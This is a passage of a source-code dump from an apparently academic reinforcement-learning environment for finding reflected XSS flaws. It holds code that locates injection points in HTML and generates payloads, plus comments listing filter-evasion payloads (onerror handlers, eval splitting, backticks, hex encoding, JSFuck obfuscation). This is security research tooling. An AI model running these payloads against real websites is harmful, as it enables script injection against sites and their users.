407 |     def curl_repr(self):
408 |         curl_string = "curl \"{0}\"".format(shell_escape(self.url))
409 |         if self._referer:
410 |             curl_string += " -e \"{0}\"".format(shell_escape(self._referer))
411 | 
412 |         if self._file_params:
413 |             # POST with multipart
414 |             for field_name, field_value in self._post_params:
415 |                 curl_string += " -F \"{0}\"".format(shell_escape("{0}={1}".format(field_name, field_value)))
416 |             for field_name, field_value in self._file_params:
417 |                 curl_upload_kv = "{0}=@your_local_file;filename={1}".format(field_name, field_value[0])
418 |                 curl_string += " -F \"{0}\"".format(shell_escape(curl_upload_kv))
419 |             pass
420 |         elif self._post_params:
421 |             # POST either urlencoded
422 |             if "urlencoded" in self._enctype:
423 |                 curl_string += " -d \"{0}\"".format(shell_escape(self.encoded_data))
424 |             else:
425 |                 # Or raw blob
426 |                 curl_string += " -H \"Content-Type: {}\" -d @payload_file".format(self._enctype)
427 | 
428 |         return curl_string
429 | 
430 |     def set_headers(self, response_headers):
431 |         """Set the HTTP headers received while requesting the resource"""
432 |         self._headers = response_headers
433 | 
434 |     @property
435 |     def size(self):
436 |         return self._size
437 | 
438 |     @size.setter
439 |     def size(self, value: int):
440 |         self._size = value
441 | 
442 |     @property
443 |     def duration(self):
444 |         return self._duration
445 | 
446 |     @duration.setter
447 |     def duration(self, value: float):
448 |         self._duration = value
449 | 
450 |     @property
451 |     def status(self) -> int:
452 |         return self._status
453 | 
454 |     @status.setter
455 |     def status(self, value: int):
456 |         self._status = value
457 | 
458 |     @property
459 |     def url(self) -> str:
460 |         if not self._cached_url:
461 |             if self._get_params:
462 |                 self._cached_url = "{0}?{1}".format(
463 |                     self._resource_path,
464 |                     self._encode_params(self._get_params)
465 |                 )
466 |             else:
467 |                 self._cached_url = self._resource_path
468 |         return self._cached_url
469 | 
470 |     @property
471 |     def hostname(self) -> str:
472 |         return self._hostname
473 | 
474 |     @property
475 |     def port(self):
476 |         return self._port
477 | 
478 |     @property
479 |     def path(self):
480 |         return self._resource_path
481 | 
482 |     @property
483 |     def file_path(self):
484 |         return self._file_path
485 | 
486 |     @property
487 |     def is_root(self) -> bool:
488 |         return True if self._file_path == "/" else False
489 | 
490 |     @property
491 |     def file_ext(self) -> str:
492 |         return posixpath.splitext(self._file_path)[1].lower()
493 | 
494 |     @property
495 |     def file_name(self) -> str:
496 |         return posixpath.basename(self._file_path)
497 | 
498 |     @property
499 |     def dir_name(self):
500 |         if self.file_name:
501 |             return posixpath.dirname(self._resource_path) + "/"
502 |         return self._resource_path
503 | 
504 |     @property
505 |     def parent_dir(self):
506 |         if self.file_name:
507 |             return posixpath.dirname(self._resource_path) + "/"
508 |         elif self.is_root:
509 |             return self._resource_path
510 |         else:
511 |             return posixpath.dirname(posixpath.dirname(self._resource_path)) + "/"
512 | 
513 |     @property
514 |     def method(self) -> str:
515 |         return self._method
516 | 
517 |     @property
518 |     def encoding(self) -> str:
519 |         return self._encoding
520 | 
521 |     @property
522 |     def enctype(self) -> str:
523 |         return self._enctype
524 | 
525 |     @property
526 |     def is_multipart(self) -> bool:
527 |         return "multipart" in self._enctype
528 | 
529 |     @property
530 |     def headers(self):
531 |         return self._headers
532 | 
533 |     @property
534 |     def referer(self) -> str:
535 |         return self._referer
536 | 
537 |     @property
538 |     def link_depth(self) -> int:
539 |         return self._link_depth
540 | 
541 |     @link_depth.setter
542 |     def link_depth(self, value: int):
543 |         self._link_depth = value
544 | 
545 |     # To prevent errors, always return a deepcopy of the internal lists
546 |     @property
547 |     def get_params(self):
548 |         # Return a list of lists containing two elements (parameter name and parameter value)
549 |         return deepcopy(self._get_params)
550 | 
551 |     @property
552 |     def post_params(self):
553 |         if isinstance(self._post_params, list):
554 |             return deepcopy(self._post_params)
555 |         return self._post_params
556 | 
557 |     @property
558 |     def file_params(self):
559 |         return deepcopy(self._file_params)
560 | 
561 |     @property
562 |     def get_keys(self):
563 |         if len(self._get_params):
564 |             return list(zip(*self._get_params))[0]
565 |         return ()
566 | 
567 |     @property
568 |     def post_keys(self):
569 |         if isinstance(self._post_params, list) and len(self._post_params):
570 |             return list(zip(*self._post_params))[0]
571 |         return ()
572 | 
573 |     @property
574 |     def file_keys(self):
575 |         if len(self._file_params):
576 |             return list(zip(*self._file_params))[0]
577 |         return ()
578 | 
579 |     @staticmethod
580 |     def _encode_params(params):
581 |         if not params:
582 |             return ""
583 | 
584 |         if not isinstance(params, list):
585 |             return params
586 | 
587 |         key_values = []
588 |         for k, v in params:
589 |             if isinstance(v, tuple) or isinstance(v, list):
590 |                 key_values.append((k, v[0]))
591 |             else:
592 |                 # May be empty string or None but will be processed differently by our own urlencode()
593 |                 key_values.append((k, v))
594 | 
595 |         return urlencode(key_values)
596 | 
597 |     @property
598 |     def encoded_params(self):
599 |         return self._encode_params(self._get_params)
600 | 
601 |     @property
602 |     def encoded_data(self):
603 |         """Return a raw string of key/value parameters for POST requests"""
604 |         return self._encode_params(self._post_params)
605 | 
606 |     @property
607 |     def encoded_files(self):
608 |         return self._encode_params(self._file_params)
609 | 
610 |     @property
611 |     def encoded_get_keys(self):
612 |         if self._cached_get_keys is None:
613 |             self._cached_get_keys = self._encoded_keys(self._get_params)
614 |         return self._cached_get_keys
615 | 
616 |     @property
617 |     def encoded_post_keys(self):
618 |         if self._cached_post_keys is None and "urlencoded" in self.enctype:
619 |             self._cached_post_keys = self._encoded_keys(self._post_params)
620 |         return self._cached_post_keys
621 | 
622 |     @property
623 |     def encoded_file_keys(self):
624 |         if self._cached_file_keys is None:
625 |             self._cached_file_keys = self._encoded_keys(self._file_params)
626 |         return self._cached_file_keys
627 | 
628 |     @property
629 |     def encoded_keys(self):
630 |         return "{}|{}|{}".format(self.encoded_get_keys, self.encoded_post_keys, self.encoded_file_keys)
631 | 
632 |     @property
633 |     def pattern(self):
634 |         return "{}?{}".format(self.path, self.encoded_keys)
635 | 
636 |     @property
637 |     def hash_params(self):
638 |         if self._cached_hash_params is None:
639 |             self._cached_hash_params = hash(self.pattern)
640 |         return self._cached_hash_params
641 | 
642 |     @property
643 |     def path_id(self):
644 |         return self._path_id
645 | 
646 |     @path_id.setter
647 |     def path_id(self, value: int):
648 |         self._path_id = value
649 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/net/xss_utils.py:
--------------------------------------------------------------------------------
  1 | import re
  2 | 
  3 | from bs4 import BeautifulSoup, element
  4 | 
  5 | 
  6 | # Note: il n'est pas nécessaire de fermer tous les parents, le noscript suffira
  7 | def close_noscript(tag):
  8 |     """Return a string with each closing parent tags for escaping a noscript"""
  9 |     s = ""
 10 |     if tag.findParent("noscript"):
 11 |         curr = tag.parent
 12 |         while True:
 13 |             s += "</{0}>".format(curr.name)
 14 |             if curr.name == "noscript":
 15 |                 break
 16 |             curr = curr.parent
 17 |     return s
 18 | 
 19 | 
 20 | # type/name/tag ex: attrval/img/src
 21 | def study(bs_node, parent=None, keyword=""):
 22 |     entries = []
 23 | 
 24 |     # if parent is None:
 25 |     #  print("Keyword is: {0}".format(keyword))
 26 |     if keyword in str(bs_node).lower():
 27 |         if isinstance(bs_node, element.Tag):
 28 |             if keyword in str(bs_node.attrs):
 29 | 
 30 |                 for k, v in bs_node.attrs.items():
 31 |                     if keyword in v:
 32 |                         # print("Found in attribute value {0} of tag {1}".format(k, bs_node.name))
 33 |                         noscript = close_noscript(bs_node)
 34 |                         d = {"type": "attrval", "name": k, "tag": bs_node.name, "noscript": noscript}
 35 |                         if d not in entries:
 36 |                             entries.append(d)
 37 | 
 38 |                     if keyword in k:
 39 |                         # print("Found in attribute name {0} of tag {1}".format(k, bs_node.name))
 40 |                         noscript = close_noscript(bs_node)
 41 |                         d = {"type": "attrname", "name": k, "tag": bs_node.name, "noscript": noscript}
 42 |                         if d not in entries:
 43 |                             entries.append(d)
 44 | 
 45 |             elif keyword in bs_node.name:
 46 |                 # print("Found in tag name")
 47 |                 noscript = close_noscript(bs_node)
 48 |                 d = {"type": "tag", "value": bs_node.name, "noscript": noscript}
 49 |                 if d not in entries:
 50 |                     entries.append(d)
 51 | 
 52 |             # recursively search injection points for the same variable
 53 |             for x in bs_node.contents:
 54 |                 for entry in study(x, parent=bs_node, keyword=keyword):
 55 |                     if entry not in entries:
 56 |                         entries.append(entry)
 57 | 
 58 |         elif isinstance(bs_node, element.Comment):
 59 |             # print("Found in comment, tag {0}".format(parent.name))
 60 |             noscript = close_noscript(bs_node)
 61 |             d = {"type": "comment", "parent": parent.name, "noscript": noscript}
 62 |             if d not in entries:
 63 |                 entries.append(d)
 64 | 
 65 |         elif isinstance(bs_node, element.NavigableString):
 66 |             # print("Found in text, tag {0}".format(parent.name))
 67 |             noscript = close_noscript(bs_node)
 68 |             d = {"type": "text", "parent": parent.name, "noscript": noscript}
 69 |             if d not in entries:
 70 |                 entries.append(d)
 71 | 
 72 |     return entries
 73 | 
 74 | 
 75 | # generate a list of payloads based on where in the webpage the js-code will be injected
 76 | def generate_payloads(html_code, code, independant_payloads):
 77 |     # We must keep the original source code because bs gives us something that may differ...
 78 |     soup = BeautifulSoup(html_code, "lxml")
 79 |     entries = study(soup, keyword=code)
 80 | 
 81 |     payloads = []
 82 | 
 83 |     for elem in entries:
 84 |         payload = ""
 85 |         # Try each case where our string can be found
 86 |         # Leave at the first possible exploitation found
 87 | 
 88 |         # Our string is in the value of a tag attribute
 89 |         # ex: <a href="our_string"></a>
 90 |         if elem["type"] == "attrval":
 91 |             # print("tag -> {0}".format(elem["tag"]))
 92 |             # print(elem["name"])
 93 |             code_index = html_code.find(code)
 94 |             attrval_index = 0
 95 |             before_code = html_code[:code_index]
 96 | 
 97 |             # Not perfect but still best than the former rfind
 98 |             attr_pattern = "\s*" + elem["name"] + "\s*=\s*"
 99 | 
100 |             # Let's find the last match
101 |             for m in re.finditer(attr_pattern, before_code, flags=re.IGNORECASE):
102 |                 attrval_index = m.end()
103 | 
104 |             attrval = before_code[attrval_index:]
105 |             # between the tag name and our injected attribute there is an equal sign and maybe
106 |             # a quote or a double-quote that we need to close before adding our payload
107 |             if attrval.startswith("'"):
108 |                 payload = "'"
109 |             elif attrval.startswith('"'):
110 |                 payload = '"'
111 | 
112 |             # we must deal differently with self-closing tags
113 |             if elem["tag"].lower() in ["img", "input"]:
114 |                 payload += "/>"
115 |             else:
116 |                 payload += "></" + elem["tag"] + ">"
117 | 
118 |             payload += elem["noscript"]
119 |             # ok let's send the requests
120 |             for xss, flags in independant_payloads:
121 |                 js_code = payload + xss.replace("__XSS__", code)
122 |                 if (js_code, flags) not in payloads:
123 |                     payloads.append((js_code, flags))
124 | 
125 |             if elem["name"].lower() == "src" and elem["tag"].lower() in ["frame", "iframe"]:
126 |                 if elem["tag"].lower() == "frame":
127 |                     flags = {"frame_src_javascript"}
128 |                 else:
129 |                     flags = {"iframe_src_javascript"}
130 | 
131 |                 js_code = "javascript:String.fromCharCode(0,__XSS__,1);".replace("__XSS__", code)
132 |                 if (js_code, flags) not in payloads:
133 |                     payloads.insert(0, (js_code, flags))
134 | 
135 |         # we control an attribute name
136 |         # ex: <a our_string="/index.html">
137 |         elif elem["type"] == "attrname":  # name,tag
138 |             if code == elem["name"]:
139 |                 for xss, flags in independant_payloads:
140 |                     js_code = '>' + elem["noscript"] + xss.replace("__XSS__", code)
141 |                     if (js_code, flags) not in payloads:
142 |                         payloads.append((js_code, flags))
143 | 
144 |         # we control the tag name
145 |         # ex: <our_string name="column" />
146 |         elif elem["type"] == "tag":
147 |             if elem["value"].startswith(code):
148 |                 # use independent payloads, just remove the first character (<)
149 |                 for xss, flags in independant_payloads:
150 |                     payload = elem["noscript"] + xss.replace("__XSS__", code)
151 |                     js_code = payload[1:]
152 |                     if (js_code, flags) not in payloads:
153 |                         payloads.append((js_code, flags))
154 |             else:
155 |                 for xss, flags in independant_payloads:
156 |                     js_code = "/>" + elem["noscript"] + xss.replace("__XSS__", code)
157 |                     if (js_code, flags) not in payloads:
158 |                         payloads.append((js_code, flags))
159 | 
160 |         # we control the text of the tag
161 |         # ex: <textarea>our_string</textarea>
162 |         elif elem["type"] == "text":
163 |             if elem["parent"] in ["title", "textarea"]:  # we can't execute javascript in those tags
164 |                 if elem["noscript"] != "":
165 |                     payload = elem["noscript"]
166 |                 else:
167 |                     payload = "</{0}>".format(elem["parent"])
168 |             elif elem["parent"] == "script":  # Control over the body of a script :)
169 |                 # Just check if we can use brackets
170 |                 js_code = "String.fromCharCode(0,__XSS__,1)".replace("__XSS__", code)
171 |                 flags = {"script_fromcharcode"}
172 |                 if (js_code, flags) not in payloads:
173 |                     payloads.insert(0, (js_code, flags))
174 | 
175 |             for xss, flags in independant_payloads:
176 |                 js_code = payload + xss.replace("__XSS__", code)
177 |                 if (js_code, flags) not in payloads:
178 |                     payloads.append((js_code, flags))
179 | 
180 |         # Injection occurred in a comment tag
181 |         # ex: <!-- <div> whatever our_string blablah </div> -->
182 |         elif elem["type"] == "comment":
183 |             payload = "-->"
184 |             if elem["parent"] in ["title", "textarea"]:  # we can't execute javascript in those tags
185 |                 if elem["noscript"] != "":
186 |                     payload += elem["noscript"]
187 |                 else:
188 |                     payload += "</{0}>".format(elem["parent"])
189 |             elif elem["parent"] == "script":  # Control over the body of a script :)
190 |                 # Just check if we can use brackets
191 |                 js_code = payload + "String.fromCharCode(0,__XSS__,1)".replace("__XSS__", code)
192 |                 flags = {"script_fromcharcode"}
193 |                 if (js_code, flags) not in payloads:
194 |                     payloads.insert(0, (js_code, flags))
195 | 
196 |             for xss, flags in independant_payloads:
197 |                 js_code = payload + xss.replace("__XSS__", code)
198 |                 if (js_code, flags) not in payloads:
199 |                     payloads.append((js_code, flags))
200 | 
201 |         html_code = html_code.replace(code, "none", 1)  # Reduce the research zone
202 |     return payloads
203 | 
204 | 
205 | def valid_xss_content_type(http_res):
206 |     """Check whether the returned content-type header allow javascript evaluation."""
207 |     # When no content-type is returned, browsers try to display the HTML
208 |     if "content-type" not in http_res.headers:
209 |         return True
210 |     # else only text/html will allow javascript (maybe text/plain will work for IE...)
211 |     if "text/html" in http_res.headers["content-type"]:
212 |         return True
213 |     return False
214 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/envs/__init__.py:
--------------------------------------------------------------------------------
1 | from gym_reflected_xss.envs.reflected_xss_env import ReflectedXSSEnv
2 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/envs/__pycache__/__init__.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/envs/__pycache__/__init__.cpython-36.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/envs/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/envs/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/envs/__pycache__/action.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/envs/__pycache__/action.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/envs/__pycache__/observation.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/envs/__pycache__/observation.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/envs/__pycache__/reflected_xss_env.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/envs/__pycache__/reflected_xss_env.cpython-36.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/envs/__pycache__/reflected_xss_env.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/envs/__pycache__/reflected_xss_env.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/envs/action.py:
--------------------------------------------------------------------------------
 1 | ACTION_SIZE = 39
 2 | 
 3 | # Generation
 4 | # Basic Payload
 5 | USING_SCRIPT_TAG = 0
 6 | PATTERN2_PAYLOAD = 1
 7 | PATTERN3_PAYLOAD = 2
 8 | # JsComponent
 9 | SRC_URL = 3
10 | IN_JAVASCRIPT = 4
11 | JAVASCRIPT_FILE = 5
12 | URL_VALUE = 6
13 | 
14 | # Mutation
15 | # Prefix
16 | MUTATE_PREFIX_SLASHBRACKET = 7
17 | MUTATE_PREFIX_DOUBLE_QUOTE = 8
18 | MUTATE_PREFIX_SINGLE_QUOTE = 9
19 | MUTATE_PREFIX_DOUBLE_QUOTE_BRACKET = 10
20 | MUTATE_PREFIX_SINGLE_QUOTE_BRACKET = 11
21 | MUTATE_PREFIX_BRACKET = 12
22 | MUTATE_PREFIX_COMMENT = 13
23 | MUTATE_PREFIX_STYLE = 14
24 | MUTATE_JS_COMMENT = 15
25 | MUTATE_PREFIX_SINGLE_QUOTE_SEMIC = 16
26 | MUTATE_PREFIX_DOUBLE_QUOTE_SEMIC = 17
27 | MUTATE_PREFIX_STRING_VALUE = 18
28 | PREFIX_ENTER = 19
29 | INSERT_EFFECTIVE_TAG = 20
30 | 
31 | 
32 | # Suffix
33 | MUTATE_SUFFIX_HTML_COMMENT = 21
34 | MUTATE_SUFFIX_SINGLE_QUOTATION = 22
35 | MUTATE_SUFFIX_DOUBLE_QUOTATION = 23
36 | 
37 | # Tag
38 | MUTATE_HTML_TAG = 24
39 | TAG_LOWER_TO_UPPER = 25
40 | INSERT_TAG_INTO_TAG = 26
41 | 
42 | # Attribute
43 | TAG_ATTRIBUTE_UPPER = 27 # <IMG SRC=X onerror="alert(1);"/>
44 | 
45 | # JS Snippet
46 | MUTATE_JAVA_SCRIPT = 28 # <script>prompt(1)</script>
47 | DIVIDE_JAVASCRIPT = 29 # <img src=x onerror='var A = "al" + "er" + "t(1);";eval(A);'></img>
48 | IN_JAVASCRIPT_PREFIX_SUFFIX_DOUBLE = 30 # "+alert(1)+"
49 | IN_JAVASCRIPT_PREFIX_SUFFIX_SINGLE = 31 # '+alert(1)+'
50 | JAVASCRIPT_NO_PARENTHESIS = 32 # <script>onerror=alert;throw 1</script>
51 | 
52 | # Entire String
53 | URL_ENCODING = 33 # %3Cscript%3E alert(1) %3C%2Fscript%3E
54 | HEXA_ENCODING = 34 # \74img src=0 onerror=alert(1)\76
55 | CODE_OBFUSCATION = 35 # [][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[
56 | WHITE_SPACE_TO_SLASH = 36 # <img/src='x'/onerror='alert(1)'/>
57 | MUTATE_QUOTATION_TO_BACK_TICK = 37 # <img src=x onerror=alert`1` />
58 | MUTATE_PARENTHESIS_TO_BACK_TICK = 38 # <script>alert`1`</script>
59 | 
60 | #BASE64_ENCODING = 29 # data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
61 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/envs/observation.py:
--------------------------------------------------------------------------------
  1 | STATE_SIZE = 47
  2 | 
  3 | # Observation Space [0,1]
  4 | # Input Payload
  5 | # Payload Appearance
  6 | CONTAIN_SCRIPT_STRING = 0
  7 | ALERT_STRING = 1
  8 | PARENTHESIS = 2
  9 | STRING_PREFIX = 3
 10 | EVENT_ELEMENT = 4
 11 | ATTRIBUTE_ELEMENT = 5
 12 | JS_PAYLOAD = 6
 13 | HTML_COMMENT_USED = 7
 14 | JS_COMMENT_USED = 8
 15 | URL_PAYLOAD = 9
 16 | JAVASCRIPT_FILE_NAME = 10
 17 | HTML_TAG_USED = 11
 18 | HTML_SCRIPT_TAG_USED = 12
 19 | HTML_MEDIA_TAG_USED = 13
 20 | SINGLE_QUOTATION = 14
 21 | DOUBLE_QUOTATION = 15
 22 | BACK_TICK = 16
 23 | BACKSLASH = 17
 24 | BRACKET = 18
 25 | PREFIX_ENTER = 19
 26 | INSERT_EFFECTIVE_TAG = 20
 27 | 
 28 | JAVASCRIPT_CODE = 21
 29 | URL_ENCODING = 22
 30 | HEXA_ENCODING = 23
 31 | CODE_OBSFUSCATION = 24
 32 | CHARACTER_UPPER = 25
 33 | ATTRIBUTE_UPPER = 26
 34 | TAG_INSERTED = 27
 35 | NO_WHITE_SPACE = 28
 36 | 
 37 | # Payload Repititiveness
 38 | INPUT_CORPUS = 29
 39 | PREVIOUS_ACTION = 30  
 40 | CURRENT_ACTION = 31
 41 | 
 42 | # Response
 43 | # Reflected Payload Appearance
 44 | TAG_INJECTED = 32
 45 | STRING_INJECTED = 33
 46 | SIMILARITY = 34
 47 | 
 48 | # PayLoad Context information
 49 | CONTENT_TYPE = 35
 50 | DEFAULT_PAYLOAD_TYPE = 36
 51 | INJECTION_POINT_TYPE = 37
 52 | BEFORE_INJECTION_POINT = 38
 53 | BEHIND_INJECTION_POINT = 39
 54 | ESCAPE_STRING = 40
 55 | EFFECTIVE_TAG_TYPE = 41
 56 | FIRST_MAGIC_STRING = 42
 57 | SECOND_MAGIC_STRING = 43
 58 | THIRD_MAGIC_STRING = 44
 59 | FOURTH_MAGIC_STRING = 45
 60 | 
 61 | # Attack 
 62 | # Attack Result
 63 | ATTACK_SUCCESS = 46
 64 | 
 65 | 
 66 | 
 67 | 
 68 | 
 69 | 
 70 | 
 71 | 
 72 | 
 73 | 
 74 | 
 75 | 
 76 | 
 77 | 
 78 | 
 79 | #BASE64 = 20
 80 | 
 81 | 
 82 | 
 83 | 
 84 | 
 85 | 
 86 | # [Output Part]
 87 | 
 88 | # [Action Selection]
 89 | 
 90 | 
 91 | # [Injection Point Informain]
 92 | 
 93 | 
 94 | #DEFAULT_PAYLOAD_TYPE = 41
 95 | # [Action Count]
 96 | """
 97 | USING_SCRIPT_TAG = 18 # 0
 98 | PATTERN2_PAYLOAD = 19 # 1
 99 | MUTATE_PREFIX_SLASHBRACKET = 20 # 2
100 | 
101 | MUTATE_HTML_TAG = 21 # 3
102 | MUTATE_PREFIX_DOUBLE_QUOTE = 22 #4
103 | MUTATE_PREFIX_SINGLE_QUOTE = 23 # 5
104 | MUTATE_PREFIX = 24 # 6
105 | MUTATE_SUFFIX = 25 #7
106 | TAG_LOWER_TO_UPPER = 26 # 8
107 | INSERT_TAG_INTO_TAG = 27 # 9
108 | INSERT_EFFECTIVE_TAG = 28 # 10
109 | MUTATE_PREFIX_COMMENT = 29 # 11
110 | MUTATE_PREFIX_STYLE = 30 # 12
111 | JAVASCRIPT_VALUE = 31 # 13
112 | URL_VALUE = 32 # 14
113 | JAVASCRIPT_FILE = 33  # 15
114 | IN_JAVASCRIPT = 34 # 16
115 | """
116 | 
117 | 
118 | 
119 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/input_module/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/input_module/__init__.py


--------------------------------------------------------------------------------
/gym_reflected_xss/input_module/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/input_module/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/input_module/__pycache__/input_generator.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/input_module/__pycache__/input_generator.cpython-36.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/input_module/__pycache__/input_generator.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/input_module/__pycache__/input_generator.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/input_module/__pycache__/pyjsfuck.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/gym_reflected_xss/input_module/__pycache__/pyjsfuck.cpython-37.pyc


--------------------------------------------------------------------------------
/gym_reflected_xss/input_module/input_generator.py:
--------------------------------------------------------------------------------
  1 | from bs4 import BeautifulSoup
  2 | from random import choice
  3 | import gym_reflected_xss.envs.action as act
  4 | import gym_reflected_xss.envs.observation as obs
  5 | import base64
  6 | from urllib import parse
  7 | from gym_reflected_xss.input_module.pyjsfuck import JSFuck
  8 | import numpy as np 
  9 | import random 
 10 | class InputGenerator():
 11 | 
 12 |     def __init__(self):
 13 |         # define element of attack payload
 14 |         self.INITIAL_STATUS = np.array([0.0] * obs.STATE_SIZE)
 15 |         self.prefixList = ["--> ", '"> ', "", "'> ", "/> ", '> ', ';} ']
 16 |         self.prefixHTMLList = ['"> ', "'> ", "/> ", '> ']
 17 |         self.prefixComment = "--> "
 18 |         self.prefixStyle = ';} '
 19 |         self.forebracket1 = "<"
 20 |         self.scriptTag="script"
 21 |         self.mediaTag = ["img", "audio", "video"]
 22 |         self.linkTag = ["a"]
 23 |         self.htmlattr = ["src"]
 24 |         self.urlattr = ['src', "href"]
 25 |         self.htmlevent = ["onerror"]
 26 |         self.forebracket2 = ">"
 27 |         self.tempPayload = "x"
 28 |         self.JSPayload = 'alert(0727);'
 29 |         self.URLPayload = "javascript:alert(0727)"
 30 |         self.JSFILEPayload = "http://data/attack.js"
 31 |         self.backbracket = "</"
 32 |         self.backbracket2 = ">"
 33 |         self.suffixList = ["<!--", "//", ""]
 34 |         self.previous_input = ""
 35 |         self.current_input = ""
 36 |         self.tag = "" 
 37 |         self.attribute = "" 
 38 |         self.event = ""
 39 |         self.value = "" 
 40 |         self.prefix = "" 
 41 |         self.suffix = "" 
 42 |         self.status = self.INITIAL_STATUS
 43 |         self.previous_action = -1
 44 |         self.current_action = -1
 45 |         self.effective_tag = []
 46 |         self.original_tag = ""
 47 |         self.use_saved_tag = False
 48 |         self.input_corpus = {'steps':0}
 49 |         self.random_tag = "980727"
 50 | 
 51 | 
 52 |     def do_action(self, action, max_try):
 53 |         add_random = True
 54 |         # random interger for detecion of attack string in the html page
 55 |         self.random_tag = str(random.randint(10000,20000))
 56 | 
 57 |         self.previous_action = self.current_action
 58 |         self.current_action = action
 59 |        
 60 |         # action information history
 61 |         self.status[obs.PREVIOUS_ACTION] = self.previous_action
 62 |         self.status[obs.CURRENT_ACTION] = self.current_action
 63 |         
 64 |         
 65 |         self.attack_src_attribute = False
 66 | 
 67 |         # initialize encoding 
 68 |         self.status[obs.HEXA_ENCODING] = 0
 69 |         #self.status[obs.BASE64] = 0
 70 |         self.status[obs.URL_ENCODING] = 0
 71 |         self.status[obs.CODE_OBSFUSCATION] = 0
 72 | 
 73 |         # ----- Basic Generation Part ----- 
 74 |         if action == act.USING_SCRIPT_TAG:
 75 |             self.use_saved_tag = False
 76 |             self.original_tag = ""
 77 |             self.action_0()
 78 |      
 79 |         elif action == act.PATTERN2_PAYLOAD:
 80 |             self.use_saved_tag = False
 81 |             self.original_tag = ""
 82 |             self.action_1()
 83 |         
 84 |         elif action == act.PATTERN3_PAYLOAD: 
 85 |             self.use_saved_tag = False
 86 |             self.original_tag = ""
 87 |             self.attack_src_attribute = True
 88 |             self.action_2()
 89 |         # ------------------------------------
 90 | 
 91 |         
 92 |         elif action == act.MUTATE_PREFIX_SLASHBRACKET:
 93 |             self.prefix = "/> " 
 94 |             pass
 95 | 
 96 |         elif action == act.MUTATE_HTML_TAG:
 97 |             self.original_tag = ""
 98 | 
 99 |             if self.tag == "script":
100 |                 self.action_1()
101 |             elif self.tag in self.mediaTag:
102 |                 self.tag = choice(self.mediaTag)
103 |             elif self.tag in self.linkTag:
104 |                 self.tag = choice(self.linkTag)
105 | 
106 |         elif action == act.MUTATE_PREFIX_DOUBLE_QUOTE:
107 |             self.prefix = '" ' 
108 | 
109 |         elif action == act.MUTATE_PREFIX_SINGLE_QUOTE:
110 |             self.prefix = "' " 
111 | 
112 |         elif action == act.MUTATE_PREFIX_DOUBLE_QUOTE_BRACKET:
113 |             self.prefix = '"> '
114 | 
115 |         elif action == act.MUTATE_PREFIX_SINGLE_QUOTE_BRACKET:
116 |             self.prefix = "'> "
117 | 
118 |         elif action == act.MUTATE_PREFIX_BRACKET:
119 |             self.prefix = "> "
120 | 
121 |         elif action == act.MUTATE_SUFFIX_HTML_COMMENT:
122 |             self.suffix = " <!--"
123 | 
124 |         elif action == act.MUTATE_JS_COMMENT:
125 |             self.suffix = "/*"
126 |             self.prefix = "*/"
127 |         elif action == act.MUTATE_SUFFIX_SINGLE_QUOTATION:
128 |             self.suffix = " '"
129 |         elif action == act.MUTATE_SUFFIX_DOUBLE_QUOTATION:
130 |             self.suffix = ' "'
131 | 
132 |         elif action == act.TAG_LOWER_TO_UPPER:
133 |             new_tag = ''.join(str.upper(c) for c in self.tag)
134 |             self.tag = new_tag
135 |             self.status[obs.CHARACTER_UPPER] = 1
136 | 
137 |         elif action == act.INSERT_TAG_INTO_TAG:
138 |             if self.tag in ["script"]  + self.mediaTag + self.linkTag:
139 |                 length = len(self.tag)
140 |                 if self.original_tag == "":
141 |                     self.original_tag = self.tag
142 |                 self.tag = ''.join([self.tag[0:length//2],self.tag,self.tag[length//2:length]])
143 |                 self.status[obs.TAG_INSERTED] = 1
144 |             elif self.original_tag:
145 |                 length = len(self.original_tag)
